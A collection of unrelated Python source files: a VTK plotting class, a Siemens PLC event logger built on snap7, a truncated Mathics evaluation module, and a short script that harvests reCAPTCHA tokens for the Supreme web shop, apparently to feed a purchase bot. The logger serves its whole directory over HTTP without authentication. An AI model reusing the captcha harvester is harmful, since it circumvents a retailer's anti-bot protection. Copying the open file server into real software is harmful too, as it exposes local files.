textcolor : string or 3 item list, optional, defaults to black Color of text. Either a string, rgb list, or hex color string. For example: textcolor='white' textcolor='w' textcolor=[1, 1, 1] textcolor='#FFFFFF' font_family : string, optional Font family. Must be either courier, times, or arial. shadow : bool, optional Adds a black shadow to the text. Defaults to False showpoints : bool, optional Controls if points are visible. Default True pointcolor : string or 3 item list, optional, defaults to black Color of points (if visible). Either a string, rgb list, or hex color string. For example: textcolor='white' textcolor='w' textcolor=[1, 1, 1] textcolor='#FFFFFF' pointsize : float, optional Size of points (if visible) Returns ------- labelMapper : vtk.vtkvtkLabeledDataMapper VTK label mapper. Can be used to change properties of the labels. """ if len(points) != len(labels): raise Exception('There must be one label for each point') vtkpoints = vtkInterface.MakePointMesh(points) vtklabels = vtk.vtkStringArray() vtklabels.SetName('labels') for item in labels: vtklabels.InsertNextValue(str(item)) vtkpoints.GetPointData().AddArray(vtklabels) # create label mapper labelMapper = vtk.vtkLabeledDataMapper() labelMapper.SetInputData(vtkpoints) textprop = labelMapper.GetLabelTextProperty() textprop.SetBold(bold) textprop.SetFontSize(fontsize) textprop.SetFontFamily(ParseFontFamily(font_family)) textprop.SetColor(ParseColor(textcolor)) textprop.SetShadow(shadow) labelMapper.SetLabelModeToLabelFieldData() labelMapper.SetFieldDataName('labels') labelActor = vtk.vtkActor2D() labelActor.SetMapper(labelMapper) # add points if showpoints: self.AddMesh(vtkpoints, style='points', color=pointcolor, psize=pointsize) else: self.AddMesh(vtkpoints) self.AddActor(labelActor) return labelMapper def AddPoints(self, points, color=None, psize=5, scalars=None, rng=None, name='', opacity=1, stitle='', flipscalars=False): """ Adds a point actor or numpy points array to plotting object """ # select color if color is None: color = [1, 1, 1] elif isinstance(color, str): color = vtkInterface.StringToRGB(color) # Convert to vtk points object if "points" is a numpy array if isinstance(points, np.ndarray): # check size of points if points.ndim != 2 or points.shape[1] != 3: try: points = points.reshape((-1, 3)) except: raise Exception('Invalid point array shape' '%s' % str(points.shape)) self.points = vtkInterface.MakeVTKPointsMesh(points) else: self.points = points # Create mapper and add lines mapper = vtk.vtkDataSetMapper() mapper.SetInputData(self.points) if np.any(scalars): # vtkInterface.AddPointScalars(self.points, scalars, name, True) self.points.AddPointScalars(scalars, name, True) mapper.SetScalarModeToUsePointData() if not rng: rng = [np.min(scalars), np.max(scalars)] elif isinstance(rng, float): rng = [-rng, rng] if np.any(rng): mapper.SetScalarRange(rng[0], rng[1]) # Flip if requested # if flipscalars: # mapper.GetLookupTable().SetHueRange(0.66667, 0.0) # Create Actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetPointSize(psize) actor.GetProperty().SetColor(color) actor.GetProperty().LightingOff() actor.GetProperty().SetOpacity(opacity) self.renderer.AddActor(actor) # Add scalar bar if stitle: self.scalarBar = vtk.vtkScalarBarActor() self.scalarBar.SetLookupTable(mapper.GetLookupTable()) self.scalarBar.GetTitleTextProperty().SetFontFamilyToCourier() self.scalarBar.GetTitleTextProperty().ItalicOff() self.scalarBar.GetTitleTextProperty().BoldOn() 
self.scalarBar.GetLabelTextProperty().SetFontFamilyToCourier() self.scalarBar.GetLabelTextProperty().ItalicOff() self.scalarBar.GetLabelTextProperty().BoldOn() self.scalarBar.SetTitle(stitle) self.scalarBar.SetNumberOfLabels(5) self.renderer.AddActor(self.scalarBar) def AddArrows(self, cent, direction, mag=1): """ Adds arrows to plotting object """ if cent.ndim != 2: cent = cent.reshape((-1, 3)) if direction.ndim != 2: direction = direction.reshape((-1, 3)) pdata = vtkInterface.CreateVectorPolyData(cent, direction * mag) arrows = CreateArrowsActor(pdata) self.AddActor(arrows) return arrows, pdata def AddLineSegments(self, points, edges, color=None, scalars=None, ncolors=256): """ Adds arrows to plotting object """ cent = (points[edges[:, 0]] + points[edges[:, 1]]) / 2 direction = points[edges[:, 1]] - points[edges[:, 0]] # pdata = vtkInterface.CreateVectorPolyData(cent, direction) pdata = vtkInterface.CreateVectorPolyData(cent, direction) arrows, mapper = CreateLineSegmentsActor(pdata) # set color if isinstance(color, str): color = vtkInterface.StringToRGB(color) mapper.ScalarVisibilityOff() arrows.GetProperty().SetColor(color) if scalars is not None: if scalars.size == edges.shape[0]: pdata.AddCellScalars(scalars, '', True) mapper.SetScalarModeToUseCellData() mapper.GetLookupTable().SetNumberOfTableValues(ncolors) # if interpolatebeforemap: # self.mapper.InterpolateScalarsBeforeMappingOn() else: raise Exception('Number of scalars must match number of edges') # add to rain class self.AddActor(arrows) return arrows def GetCameraPosition(self): """ Returns camera position of active render window """ camera = self.renderer.GetActiveCamera() pos = camera.GetPosition() fpt = camera.GetFocalPoint() vup = camera.GetViewUp() return [pos, fpt, vup] def SetCameraPosition(self, cameraloc): """ Set camera position of active render window """ camera = self.renderer.GetActiveCamera() camera.SetPosition(cameraloc[0]) camera.SetFocalPoint(cameraloc[1]) camera.SetViewUp(cameraloc[2]) # reset clipping range self.renderer.ResetCameraClippingRange() def SetBackground(self, color): """ Sets background color Parameters ---------- color : string or 3 item list, optional, defaults to white Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' """ if color is None: color = [1, 1, 1] elif isinstance(color, str): color = vtkInterface.StringToRGB(color) self.renderer.SetBackground(color) def AddLegend(self, entries, bcolor=[0.5, 0.5, 0.5], border=False, pos=None): """ Adds a legend to render window. Entries must be a list containing one string and color entry for each item pos : list Two float list, each float between 0 and 1. For example [0.5, 0.5] would put the legend in the middle of the figure. 
Example ------- legend_entries = [] legend_entries.append(['Label', 'w']) plobj = PlotClass() plobj.AddMesh(mesh) plobj.AddLegend(legend_entries) plobj.Plot() """ legend = vtk.vtkLegendBoxActor() legend.SetNumberOfEntries(len(entries)) if pos: legend.SetPosition2(pos[0], pos[1]) c = 0 legendface = MakeLegendPoly() for entry in entries: color = ParseColor(entry[1]) legend.SetEntry(c, legendface, entry[0], color) c += 1 legend.UseBackgroundOn() legend.SetBackgroundColor(bcolor) if border: legend.BorderOn() else: legend.BorderOff() # Add to renderer self.renderer.AddActor(legend) return legend def _plot(self, title=None, window_size=[1024, 768], interactive=True, autoclose=True, interactive_update=False): """ Creates plotting window Parameters ---------- title : string, optional Title of plotting window. window_size : list, optional Window size in pixels. Defaults to [1024, 768] interactive : bool, optional Enabled by default. Allows user to pan and move figure. autoclose : bool, optional Enabled by default. Exits plotting session when user closes the window when interactive is True. interactive_update: bool, optional Disabled by default. Allows user to non-blocking draw, user should call Update() in each iteration. Returns ------- cpos : list List of camera position, focal point, and view up """ if title: self.renWin.SetWindowName(title) # size window self.renWin.SetSize(window_size[0], window_size[1]) # Render if interactive and (not self.off_screen): self.renWin.Render() self.iren.Initialize() if not interactive_update: # interrupts will be caught here try: self.iren.Start() except KeyboardInterrupt: self.Close() raise KeyboardInterrupt else: self.renWin.Render() # Get camera position before closing cpos = self.GetCameraPosition() if autoclose: self.Close() return cpos def Plot(self, title=None, window_size=[1024, 768], interactive=True, autoclose=True, in_background=False, interactive_update=False): """ Creates plotting window Parameters ---------- title : string, optional Title of plotting window. window_size : list, optional Window size in pixels. Defaults to [1024, 768] interactive : bool, optional Enabled by default. Allows user to pan and move figure. autoclose : bool, optional Enabled by default. Exits plotting session when user closes the window when interactive is True. interactive_update: bool, optional Disabled by default. Allows user to non-blocking draw, user should call Update() in each iteration. Returns ------- cpos : list List of camera position, focal point, and view up """ def PlotFun(): return self._plot(title, window_size, interactive, autoclose, interactive_update) if in_background: process = Process(target=PlotFun) process.start() return process else: return PlotFun() def RemoveActor(self, actor): self.renderer.RemoveActor(actor) def AddAxes(self): """ Add axes actor at origin """ axes = vtk.vtkAxesActor() self.marker = vtk.vtkOrientationMarkerWidget() self.marker.SetInteractor(self.iren) self.marker.SetOrientationMarker(axes) self.marker.SetEnabled(1) def TakeScreenShot(self, filename=None): """ Takes screenshot at current camera position Parameters ---------- filename : str, optional Filename to write image to. Returns ------- img : numpy.ndarray Array containing pixel RGB and alpha. 
Sized: [Window height x Window width x 4] """ # check render window exists if not hasattr(self, 'renWin'): raise Exception('Render window has been closed.\n' 'Run again with Plot(autoclose=False)') # create image filter ifilter = vtk.vtkWindowToImageFilter() ifilter.SetInput(self.renWin) ifilter.SetInputBufferTypeToRGBA() ifilter.ReadFrontBufferOff() ifilter.Update() image = ifilter.GetOutput() origshape = image.GetDimensions() img_array = vtkInterface.GetPointScalars(image, 'ImageScalars') # overwrite background background = self.renderer.GetBackground() mask = img_array[:, -1] == 0 img_array[mask, 0] = int(255 * background[0]) img_array[mask, 1] = int(255 * background[1]) img_array[mask, 2] = int(255 * background[2]) img_array[mask, -1] = 255 mask = img_array[:, -1] != 255 img_array[mask, -1] = 255 # write screenshot to file img = img_array.reshape((origshape[1], origshape[0], -1))[::-1, :, :] if filename: image = Image.fromarray(img) image.save(filename) return img def Render(self): self.renWin.Render() def __del__(self): log.debug('Object collected') def CreateLineSegmentsActor(pdata): # Create arrow object lines_source = vtk.vtkLineSource() lines_source.Update() glyph3D = vtk.vtkGlyph3D() glyph3D.SetSourceData(lines_source.GetOutput()) glyph3D.SetInputData(pdata) glyph3D.SetVectorModeToUseVector() glyph3D.Update() # Create mapper mapper = vtk.vtkDataSetMapper() mapper.SetInputConnection(glyph3D.GetOutputPort()) # Create actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().LightingOff() return actor, mapper def CreateArrowsActor(pdata): """ Creates an actor composed of arrows """ # Create arrow object arrow = vtk.vtkArrowSource() arrow.Update() glyph3D = vtk.vtkGlyph3D() glyph3D.SetSourceData(arrow.GetOutput()) glyph3D.SetInputData(pdata) glyph3D.SetVectorModeToUseVector() glyph3D.Update() # Create mapper mapper = vtk.vtkDataSetMapper() mapper.SetInputConnection(glyph3D.GetOutputPort()) # Create actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().LightingOff() return actor def PlotGrids(grids, wFEM=False, background=[0, 0, 0], style='wireframe', legend_entries=None): """ Creates a plot of several grids as wireframes. 
When wFEM is true, the first grid is a white solid """ # Make grid colors N = len(grids) HSV_tuples = [(x * 1.0 / N, 0.5, 0.5) for x in range(N)] colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), HSV_tuples)) pobj = PlotClass() for i in range(len(grids)): if not i and wFEM: # Special plotting for first grid pobj.AddMesh(grids[i]) else: pobj.AddMesh(grids[i], color=colors[i], style=style) # Render plot and delete when finished pobj.SetBackground(background) if legend_entries: legend = [] for i in range(len(legend_entries)): legend.append([legend_entries[i], colors[i]]) pobj.AddLegend(legend) pobj.Plot() def PlotEdges(mesh, angle, width=10): """ Plots edges of a mesh """ edges = vtkInterface.GetEdgePoints(mesh, angle, False) pobj = PlotClass() pobj.AddLines(edges, [0, 1, 1], width) pobj.AddMesh(mesh) pobj.Plot() def PlotBoundaries(mesh, **args): """ Plots boundaries of a mesh """ featureEdges = vtk.vtkFeatureEdges() featureEdges.SetInputData(mesh) featureEdges.FeatureEdgesOff() featureEdges.BoundaryEdgesOn() featureEdges.NonManifoldEdgesOn() featureEdges.ManifoldEdgesOff() featureEdges.Update() edges = vtkInterface.PolyData(featureEdges.GetOutput()) plobj = PlotClass() plobj.AddMesh(edges, 'r', style='wireframe') plobj.AddMesh(mesh) plobj.Plot() def MakeLegendPoly(): """ Creates a legend polydata object """ pts = np.zeros((4, 3)) vtkpoints = vtkInterface.MakevtkPoints(pts) triangles = np.array([[4, 0, 1, 2, 3]], np.int64) vtkcells = vtk.vtkCellArray() vtkcells.SetCells(triangles.shape[0], VN.numpy_to_vtkIdTypeArray(triangles, deep=True)) # Create polydata object mesh = vtk.vtkPolyData() mesh.SetPoints(vtkpoints) mesh.SetPolys(vtkcells) return mesh def ParseColor(color): """ Parses color into a vtk friendly rgb list """ if color is None: return [1, 1, 1] elif isinstance(color, str): return vtkInterface.StringToRGB(color) elif len(color) == 3: return color else: raise Exception(""" Invalid color input Must ba string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF'""") def ParseFontFamily(font_family): """ checks font name """ # check font name font_family = font_family.lower() if font_family not in ['courier', 'times', 'arial']: raise Exception('Font must be either "courier", "times" ' + 'or "arial"') return font_keys[font_family]
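# Hedged usage sketch for the plotting module above (not part of the original
# file): renders a random point cloud colored by height off screen and grabs a
# screenshot. Only functions and parameters defined above are used; the data
# and output filename are made up for illustration.
import numpy as np

points = np.random.rand(1000, 3)
plobj = PlotClass(off_screen=True)
plobj.AddPoints(points, scalars=points[:, 2], psize=8, stitle='Z height')
plobj.Plot(autoclose=False)            # renders off screen, keeps the window open
img = plobj.TakeScreenShot('points.png')
plobj.Close()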
S7Logger.py
# Only Bool-type of memory values supported! # for taglists.txt: show all columns, select all (CTRL+A) and paste to notepad # columns should be in following order: Name, Tag table, Data type, Address # tags export to xlsx is not supported # If there is need to debug, enable this # logging.basicConfig(level=logging.DEBUG) # If you destroy/wipe the log file, append manually Memory,Type,Date,Time, to the first row! # IP-address for PLC, this is for the Distributing Station ipaddress = "169.254.0.101" # Scan time in seconds scantime = 0.1 # for offline logging. Using fixed day which is then incremented offline = False offlineDate = "2017-03-01" # import some stuff import snap7.client as c from snap7.util import * from snap7.snap7types import * import time import sys import threading import SimpleHTTPServer import SocketServer import random # create dict to store IO objects names = {} class IOObject: # counter for how many IOs we are logging IOCount = 0 # constructor def __init__(self, name, dtype, ioType, byte, bit): self.name = name self.dtype = dtype self.ioType = ioType self.byte = byte self.bit = bit self.reading = 0 self.edgeFlag = False IOObject.IOCount += 1 # display the count def displayCount(self): print IOObject.IOCount def returnName(self): return self.name def returnType(self): return self.dtype def returnIoType(self): return self.ioType def returnByte(self): return self.byte def returnBit(self): return self.bit # flag for edge detection def setEdgeFlag(self): self.edgeFlag = True # flag for resetting def resetEdgeFlag(self): self.edgeFlag = False def returnEdgeFlag(self): return self.edgeFlag def readIO(self): if self.dtype != "Bool": print "Only Boolean memory types are supported!" return # areas: # PA = Process outputs, PE = Process inputs, MK = Merkers if self.ioType == "Q": result = plc.read_area(areas['PA'], 0, int(self.byte), S7WLBit) if self.ioType == "I": result = plc.read_area(areas['PE'], 0, int(self.byte), S7WLBit) if self.ioType == "M": result = plc.read_area(areas['MK'], 0, int(self.byte), S7WLBit) # return the value return get_bool(result, 0, int(self.bit)) # for printing human-readable things about our objects def __str__(self): return "%s %s %s %s %s" % (self.name, self.dtype, self.ioType, self.byte, self.bit) # this function will read the text file and save the IOs to dict def readTags(): # okay, lets open this file taglist = open('taglist.txt', 'r') # then loop through all of the lines for line in taglist: # and split them by line break splitline = line.split('\n') # how to not name variables.. name = splitline[0].strip().split('\t') # print list(name[0]) # ignore files starting with hashtag if not list(name[0])[0] == "#": # sorry about this mess, memory addresses were tough for me address = name[3].split(".") # print address dtype = name[2] addresslist = list(address[0]) ioType = addresslist[1] byte = ''.join(addresslist[2:]) # Memory types without byte,bit type of address are not supported if len(address) > 1: # prevent indexerror bit = address[1] # call the constructor names[name[0]] = IOObject(name[0], dtype, ioType, byte, bit) # let the user know if there is any unsupported type of tags else: # instructions for user print "\nNOTICE: " + name[2] + " is not supported!" 
# actual logging def logToFile(): # Inputs, Outputs or Memory objects for IOM in names: # renaming thisIO = names[IOM] # read the certain IO value = thisIO.readIO() # time formatting datestamp = time.strftime('%Y-%m-%d') timestamp = time.strftime('%H:%M:%S') # Logging only if this IO is True and edge flag is on if value == True and thisIO.returnEdgeFlag(): # write to file the name and type f.write(thisIO.returnName() + "," + thisIO.returnIoType()) # and of cource date- and timestamp, duh f.write("," + datestamp + "," + timestamp + '\n') # also print something to console #print('\n' + thisIO.returnName() + " event logged") # reset the edge flag thisIO.resetEdgeFlag() # From falling edge set the edge flag if value == False: thisIO.setEdgeFlag() # random logging def offlineLogging(): # every minute, increment the day if ((int(time.strftime('%S')) % 20) == 0): global offlineDate #print offlineDate s = "-" date = offlineDate.split(s)[2] month = offlineDate.split(s)[1] year = offlineDate.split(s)[0] date = int(date) + 1 seq = (year, month, str(date)) offlineDate = s.join(seq) print "Day changed to: " + offlineDate time.sleep(random.randint(1,2)) if date == 30: raise NameError('Thank you for using offline mode!') # every second, log a random event thisIO = names[random.choice(names.keys())] timestamp = time.strftime('%H:%M:%S') # but I still did it. Logging every five seconds if (int(time.strftime('%S')) % 1) == 0: f.write(thisIO.returnName() + "," + thisIO.returnIoType()) f.write("," + offlineDate + "," + timestamp + '\n') time.sleep(random.randint(1,2)) # serving the local directory, used for providing log.csv to the frontend def my_tcp_server(): server = SocketServer.TCPServer(('', 8080), SimpleHTTPServer.SimpleHTTPRequestHandler) print 'Started httpserver on port ', 8080 server.serve_forever() # MAIN LOOP if __name__ == "__main__": # Create client plc = c.Client() # read the tags and create objects readTags() # ONLINE: lets connect if offline == False: # arguments are for rack 0, slot 2 plc.connect(ipaddress, 0, 2) # print all the IO objects to console just to make sure print "These " + str(IOObject.IOCount) + " memory addresses will be logged: " for x in names: print " " + str(names[x]) print "Online mode activated" # OFFLINE: let the user know else: print "Offline mode activated" # just a little fun to console.. sorry I was tired print "Initializing", for x in range(0, IOObject.IOCount): print ".", time.sleep(scantime) # instructions for the user print '\n' + "Use CTRL + C to end logging if you are running in console." 
+ '\n' try: # serving the log file from local directory threading.Thread(target=my_tcp_server).start() # Scanning loop while True: # time formatting timestamp = time.strftime('%H:%M:%S') # Open the file where we log the data f = open('log.csv', 'a') # if we are online, lets log if offline == False: # Let the user know that scanning is active sys.stdout.write( '\r Scanning PLC memory on ' + timestamp + ' with the scan time of ' + str(scantime) + ' seconds' + ' on http://127.0.0.1:8080/S7PivotVisualizer.html') sys.stdout.flush() logToFile() # if we are offline, generate something random for demonstrating else: sys.stdout.write( '\r Offline mode on ' + timestamp + ' with the scan time of ' + str(scantime) + ' seconds' + ' on http://127.0.0.1:8080/S7PivotVisualizer.html') sys.stdout.flush() offlineLogging() # Close the workfile so the logged data can be viewed while the script is running f.close() # Wait for five seconds time.sleep(scantime) # to break out from loop in console (CTRL+C) except KeyboardInterrupt: logFile = open('workfile.txt', 'r') print "\n \n" + "Thank you for using S7Logger! Here are the contents of the workfile: " + "\n" for line in logFile: print line plc.disconnect() logFile.close() print "Workfile closed. Bye!"
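# Hedged illustration (not part of the original logger) of the tab-separated
# taglist.txt layout that readTags() expects. Column order is Name, Tag table,
# Data type, Address; the tag names and addresses below are made up. Lines
# whose name starts with '#' are skipped, and only Bool tags with a
# %X<byte>.<bit> style address in the I, Q or M areas are supported.
sample_taglist = (
    "StartButton\tDefault tag table\tBool\t%I0.0\n"
    "ConveyorOn\tDefault tag table\tBool\t%Q0.1\n"
    "CycleActive\tDefault tag table\tBool\t%M2.3\n"
    "#Ignored\tDefault tag table\tBool\t%I0.5\n"
)
# e.g. readTags() parses '%Q0.1' into ioType 'Q', byte '0', bit '1'.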
supreme.py
import os
import json
import logging
import threading

from harvester import Harvester
from main import run_all


def profiles_exist(profiles_file):
    """Check that profile data (personal information) exists."""
    with open(profiles_file) as f:
        profiles = json.load(f)
        if profiles:
            return True


def tasks_exist(tasks_file):
    """Check that at least one task exists."""
    with open(tasks_file) as f:
        if json.load(f):
            return True


def main():
    tasks_path = os.path.abspath("data/tasks.json")
    profiles_path = os.path.abspath("data/profiles.json")
    if not tasks_exist(tasks_path):
        print("No tasks found")
    elif not profiles_exist(profiles_path):
        print("No profiles found")
    else:
        run_all(tasks_path, profiles_path)


def start_captcha_server():
    """
    reCAPTCHA handling: this thread collects up to five reCAPTCHA tokens.
    Keep a lock flag so concurrent threads do not race on writes.
    """
    logging.getLogger('harvester').setLevel(logging.CRITICAL)
    harvester = Harvester()
    harvester.intercept_recaptcha_v2(
        domain='www.supremenewyork.com',
        sitekey='6LeWwRkUAAAAAOBsau7KpuC9AV-6J8mhw4AjC3Xz'
    )
    server_thread = threading.Thread(target=harvester.serve, daemon=True)
    server_thread.start()
    harvester.launch_browser()


if __name__ == "__main__":
    start_captcha_server()
    main()
evaluation.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import pickle from queue import Queue import os import sys from threading import Thread, stack_size as set_thread_stack_size from typing import Tuple from mathics_scanner import TranslateError from mathics import settings from mathics.core.expression import ensure_context, KeyComparable, SymbolAborted FORMATS = [ "StandardForm", "FullForm", "TraditionalForm", "OutputForm", "InputForm", "TeXForm", "MathMLForm", "MatrixForm", "TableForm", ] class EvaluationInterrupt(Exception): pass class AbortInterrupt(EvaluationInterrupt): pass class TimeoutInterrupt(EvaluationInterrupt): pass class ReturnInterrupt(EvaluationInterrupt): def __init__(self, expr): self.expr = expr class BreakInterrupt(EvaluationInterrupt): pass class ContinueInterrupt(EvaluationInterrupt): pass class WLThrowInterrupt(EvaluationInterrupt): def __init__(self, value, tag=None): self.tag = tag self.value = value def _thread_target(request, queue) -> None: try: result = request() queue.put((True, result)) except BaseException: exc_info = sys.exc_info() queue.put((False, exc_info)) # MAX_RECURSION_DEPTH gives the maximum value allowed for $RecursionLimit. it's usually set to its # default settings.DEFAULT_MAX_RECURSION_DEPTH. MAX_RECURSION_DEPTH = max( settings.DEFAULT_MAX_RECURSION_DEPTH, int(os.getenv("MATHICS_MAX_RECURSION_DEPTH", settings.DEFAULT_MAX_RECURSION_DEPTH)), ) def python_recursion_depth(n) -> int: # convert Mathics recursion depth to Python recursion depth. this estimates how many Python calls # we need at worst to process one Mathics recursion. return 200 + 30 * n def python_stack_size(n) -> int: # n is a Mathics recursion depth # python_stack_frame_size is the (maximum) number of bytes Python needs for one call on the stack. python_stack_frame_size = 512 # value estimated experimentally return python_recursion_depth(n) * python_stack_frame_size def set_python_recursion_limit(n) -> None: "Sets the required python recursion limit given $RecursionLimit value" python_depth = python_recursion_depth(n) sys.setrecursionlimit(python_depth) if sys.getrecursionlimit() != python_depth: raise OverflowError def run_with_timeout_and_stack(request, timeout, evaluation): """ interrupts evaluation after a given time period. Provides a suitable stack environment. """ # only use set_thread_stack_size if max recursion depth was changed via the environment variable # MATHICS_MAX_RECURSION_DEPTH. if it is set, we always use a thread, even if timeout is None, in # order to be able to set the thread stack size. if MAX_RECURSION_DEPTH > settings.DEFAULT_MAX_RECURSION_DEPTH: set_thread_stack_size(python_stack_size(MAX_RECURSION_DEPTH)) elif timeout is None: return request() queue = Queue(maxsize=1) # stores the result or exception thread = Thread(target=_thread_target, args=(request, queue)) thread.start() # Thead join(timeout) can leave zombie threads (we are the parent) # when a time out occurs, but the thread hasn't terminated. See # https://docs.python.org/3/library/multiprocessing.shared_memory.html # for a detailed discussion of this. # # To reduce this problem, we make use of specific properties of # the Mathics evaluator: if we set "evaluation.timeout", the # next call to "Expression.evaluate" in the thread will finish it # immediately. # # However this still will not terminate long-running processes # in Sympy or or libraries called by Mathics that might hang or run # for a long time. 
thread.join(timeout) if thread.is_alive(): evaluation.timeout = True while thread.is_alive(): pass evaluation.timeout = False evaluation.stopped = False raise TimeoutInterrupt() success, result = queue.get() if success: return result else: raise result[0].with_traceback(result[1], result[2]) class Out(KeyComparable): def __init__(self) -> None: self.is_message = False self.is_print = False self.text = "" def get_sort_key(self) -> Tuple[bool, bool, str]: return (self.is_message, self.is_print, self.text) class Message(Out): def __init__(self, symbol, tag, text: str) -> None: super(Message, self).__init__() self.is_message = True self.symbol = symbol self.tag = tag self.text = text def __str__(self) -> str: return "{}::{}: {}".format(self.symbol, self.tag, self.text) def __eq__(self, other) -> bool: return self.is_message == other.is_message and self.text == other.text def get_data(self): return { "message": True, "symbol": self.symbol, "tag": self.tag, "prefix": "%s::%s" % (self.symbol, self.tag), "text": self.text, } class Print(Out): def __init__(self, text) -> None: super(Print, self).__init__() self.is_print = True self.text = text def __str__(self) -> str: return self.text def __eq__(self, other) -> bool: return self.is_message == other.is_message and self.text == other.text def get_data(self): return { "message": False, "text": self.text, } class Result(object): def __init__(self, out, result, line_no, last_eval=None) -> None: self.out = out self.result = result self.line_no = line_no self.last_eval = last_eval def get_data(self): return { "out": [out.get_data() for out in self.out], "result": self.result, "line": self.line_no, } class Output(object): def max_stored_size(self, settings) -> int: return settings.MAX_STORED_SIZE def out(self, out): pass def clear(self, wait): raise NotImplementedError def display(self, data, metadata): raise NotImplementedError class Evaluation(object): def __init__( self, definitions=None, output=None, format="text", catch_interrupt=True ) -> None: from mathics.core.definitions import Definitions from mathics.core.expression import Symbol if definitions is None: definitions = Definitions() self.definitions = definitions self.recursion_depth = 0 self.timeout = False self.timeout_queue = [] self.stopped = False self.out = [] self.output = output if output else Output() self.listeners = {} self.options = None self.predetermined_out = None self.quiet_all = False self.format = format self.catch_interrupt = catch_interrupt self.SymbolNull = Symbol("Null") # status of last evaluate self.exc_result = self.SymbolNull self.last_eval = None def parse(self, query): "Parse a single expression and print the messages." from mathics.core.parser import MathicsSingleLineFeeder return self.parse_feeder(MathicsSingleLineFeeder(query)) def parse_evaluate(self, query, timeout=None): expr = self.parse(query) if expr is not None: return self.evaluate(expr, timeout) def parse_feeder(self, feeder): return self.parse_feeder_returning_code(feeder)[0] def parse_feeder_returning_code(self, feeder): "Parse a single expression from feeder and print the messages." from mathics.core.parser.util import parse_returning_code try: result, source_code = parse_returning_code(self.definitions, feeder) except TranslateError: self.recursion_depth = 0 self.stopped = False source_code = "" result = None feeder.send_messages(self) return result, source_code def evaluate(self, query, timeout=None, format=None): """Evaluate a Mathics expression and return the result of evaluation. 
On return self.exc_result will contain status of various exception type of result like $Aborted, Overflow, Break, or Continue. If none of the above applies self.exc_result is Null """ from mathics.core.expression import Symbol, Expression from mathics.core.rules import Rule self.recursion_depth = 0 self.timeout = False self.stopped = False self.exc_result = self.SymbolNull self.last_eval = None if format is None: format = self.format line_no = self.definitions.get_line_no() line_no += 1 self.definitions.set_line_no(line_no) history_length = self.definitions.get_history_length() result = None def check_io_hook(hook): return len(self.definitions.get_ownvalues(hook)) > 0 def evaluate(): if history_length > 0: self.definitions.add_rule("In", Rule(Expression("In", line_no), query)) if check_io_hook("System`$Pre"): self.last_eval = Expression("System`$Pre", query).evaluate(self) else: self.last_eval = query.evaluate(self) if check_io_hook("System`$Post"): self.last_eval = Expression("System`$Post", self.last_eval).evaluate( self ) if history_length > 0: if self.predetermined_out is not None: out_result = self.predetermined_out self.predetermined_out = None else: out_result = self.last_eval stored_result = self.get_stored_result(out_result) self.definitions.add_rule( "Out", Rule(Expression("Out", line_no), stored_result) ) if self.last_eval != self.SymbolNull: if check_io_hook("System`$PrePrint"): self.last_eval = Expression( "System`$PrePrint", self.last_eval ).evaluate(self) return self.format_output(self.last_eval, format) else: self.exec_result = self.SymbolNull return None try: try: result = run_with_timeout_and_stack(evaluate, timeout, self) except KeyboardInterrupt: if self.catch_interrupt: self.exc_result = SymbolAborted else: raise except ValueError as exc: text = str(exc) if ( text == "mpz.pow outrageous exponent" or text == "mpq.pow outrageous exp num" # noqa ): self.message("General", "ovfl") self.exc_result = Expression("Overflow") else: raise except WLThrowInterrupt as ti: if ti.tag: self.exc_result = Expression( "Hold", Expression("Throw", ti.value, ti.tag) ) else: self.exc_result = Expression("Hold", Expression("Throw", ti.value)) self.message("Throw", "nocatch", self.exc_result) except OverflowError: self.message("General", "ovfl") self.exc_result = Expression("Overflow") except BreakInterrupt: self.message("Break", "nofdw") self.exc_result = Expression("Hold", Expression("Break")) except ContinueInterrupt: self.message("Continue", "nofdw") self.exc_result = Expression("Hold", Expression("Continue")) except TimeoutInterrupt: self.stopped = False self.timeout = True self.message("General", "timeout") self.exc_result = SymbolAborted except AbortInterrupt: # , error: self.exc_result = SymbolAborted except ReturnInterrupt as ret: self.exc_result = ret.expr if self.exc_result is not None: self.recursion_depth = 0 if self.exc_result != self.SymbolNull: result = self.format_output(self.exc_result, format) result = Result(self.out, result, line_no, self.last_eval) self.out = [] finally: self.stop() history_length = self.definitions.get_history_length() line = line_no - history_length while line > 0: unset_in = self.definitions.unset("In", Expression("In", line)) unset_out = self.definitions.unset("Out", Expression("Out", line)) if not (unset_in or unset_out): break line -= 1 return result def get_stored_result(self, eval_result): """Return `eval_result` stripped of any format, e.g. FullForm, MathML, TeX that it might have been wrapped in. 
""" if eval_result.has_form(FORMATS, 1): return eval_result.leaves[0] return eval_result def stop(self) -> None: self.stopped = True def format_output(self, expr, format=None): if format is None: format = self.format if isinstance(format, dict): return dict((k, self.format_output(expr, f)) for k, f in format.items()) from mathics.core.expression import Expression, BoxError if format == "text": result = expr.format(self, "System`OutputForm") elif format == "xml": result = Expression("StandardForm", expr).format(self, "System`MathMLForm") elif format == "tex": result = Expression("StandardForm", expr).format(self, "System`TeXForm") elif format == "unformatted": self.exc_result = None return expr else: raise ValueError try: boxes = result.boxes_to_text(evaluation=self) except BoxError: self.message( "General", "notboxes", Expression("FullForm", result).evaluate(self) ) boxes = None return boxes def set_quiet_messages(self, messages) -> None: from mathics.core.expression import Expression value = Expression("List", *messages) self.definitions.set_ownvalue("Internal`$QuietMessages", value) def get_quiet_messages(self): from mathics.core.expression import Expression value = self.definitions.get_definition("Internal`$QuietMessages").ownvalues if value: try: value = value[0].replace except AttributeError: return [] if not isinstance(value, Expression): return [] return value.leaves def message(self, symbol, tag, *args) -> None: from mathics.core.expression import String, Symbol, Expression, from_python # Allow evaluation.message('MyBuiltin', ...) (assume # System`MyBuiltin) symbol = ensure_context(symbol) quiet_messages = set(self.get_quiet_messages()) pattern = Expression("MessageName", Symbol(symbol), String(tag)) if pattern in quiet_messages or self.quiet_all: return # Shorten the symbol's name according to the current context # settings. This makes sure we print the context, if it would # be necessary to find the symbol that this message is # attached to. symbol_shortname = self.definitions.shorten_name(symbol) if settings.DEBUG_PRINT: print("MESSAGE: %s::%s (%s)" % (symbol_shortname, tag, args)) text = self.definitions.get_value(symbol, "System`Messages", pattern, self) if text is None: pattern = Expression("MessageName", Symbol("General"), String(tag)) text = self.definitions.get_value( "System`General", 